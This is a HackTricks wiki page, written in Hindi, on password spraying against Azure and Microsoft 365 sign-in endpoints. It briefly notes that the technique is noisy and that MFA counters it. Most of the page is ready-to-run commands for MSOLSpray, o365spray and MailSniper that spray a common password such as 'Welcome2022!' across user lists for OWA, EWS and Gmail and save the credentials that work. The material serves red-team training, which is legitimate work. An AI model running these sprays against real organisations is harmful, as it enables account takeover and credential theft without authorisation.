Az - Password Spraying

AWS हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)

हैकट्रिक्स का समर्थन करें

सदस्यता योजनाएं की जाँच करें!
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो** करें।
**हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github रेपो में PR जमा करके।

पासवर्ड स्प्रे

Azure में इसे अलग-अलग API एंडपॉइंट के खिलाफ किया जा सकता है जैसे Azure AD Graph, Microsoft Graph, Office 365 Reporting वेबसर्विस आदि।

हालांकि, ध्यान दें कि यह तकनीक बहुत शोरगुल है और ब्लू टीम इसे आसानी से पकड़ सकती है। इसके अतिरिक्त, मजबूर पासवर्ड कॉम्प्लेक्सिटी और MFA का उपयोग इस तकनीक को अव्यावहारिक बना सकता है।

आप MSOLSpray के साथ एक पासवर्ड स्प्रे हमला कर सकते हैं।

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

या o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

या MailSniper के साथ

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt

AWS हैकिंग सीखें और अभ्यास करें:HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)

हैकट्रिक्स का समर्थन करें

सदस्यता योजनाएं की जाँच करें!
💬 डिस्कॉर्ड समूह या टेलीग्राम समूह में शामिल हों या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो** करें।
HackTricks और HackTricks Cloud github रिपॉजिटरी में PR जमा करके हैकिंग ट्रिक्स साझा करें।

PreviousAz - Device Code Authentication Phishing NextAz - Services

Last updated 1 month ago